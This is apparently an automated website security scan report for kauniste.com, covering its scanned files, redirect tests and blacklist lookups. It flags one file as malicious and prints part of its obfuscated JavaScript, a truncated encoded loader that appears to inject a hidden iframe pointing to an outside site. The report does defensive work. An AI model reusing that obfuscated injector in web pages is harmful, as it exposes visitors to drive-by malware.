Scanned pages/files
Request | Server response | Status |
http://kauniste.com/ | 200 OK Content-Length: 4968 Content-Type: text/html | clean |
http://www.kauniste.com/src/js/jquery.min.js | 200 OK Content-Length: 91557 Content-Type: application/javascript | clean |
http://www.kauniste.com/src/js/jquery.backstretch.js | 200 OK Content-Length: 2769 Content-Type: application/javascript | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://kauniste.com/?lng=fi | 200 OK Content-Length: 4968 Content-Type: text/html | clean |
http://kauniste.com/?lng=en | 200 OK Content-Length: 4897 Content-Type: text/html | clean |
http://kauniste.com/?lng=jp | 200 OK Content-Length: 5434 Content-Type: text/html | clean |
http://kauniste.com/test404page.js | 404 Not Found Content-Length: 7564 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zlocg=4;rdjmiw=("6b,b1,c0,b9,ae,bf,b4,ba,b9,6b,b4,bf,c4,7b,84,73,74,6b,c6,58,55,6b,c1,ac,bd,6b,be,bf,ac,bf,b4,ae,88,72,ac,b5,ac,c3,72,86,58,55,6b,c1,ac,bd,6b,ae,ba,b9,bf,bd,ba,b7,b7,b0,bd,88,72,b4,b9,af,b0,c3,79,bb,b3,bb,72,86,58,55,6b,c1,ac,bd,6b,b4,bf,c4,6b,88,6b,af,ba,ae,c0,b8,b0,b9,bf,79,ae,bd,b0,ac,bf,b0,90,b7,b0,b8,b0,b9,bf,73,72,b4,b1,bd,ac,b8,b0,72,74,86,58,55,58,55,6b,b4,bf,c4,79,be,bd,ae,6b,88,6b,72,b3,bf,bf,bb,85,7a,7a,c2,c2,c2,79,ac,ad,ae,78,b7,b4,b1,b0,be,b Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kauniste.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 12:46:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: kauniste.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 12:46:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: kauniste.com
Referer: http://www.google.com/search?q=kauniste.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kauniste.com
Referer: http://www.google.com/search?q=kauniste.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kauniste.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kauniste.com/
Result: kauniste.com is not infected or malware details are not published yet.
Result: kauniste.com is not infected or malware details are not published yet.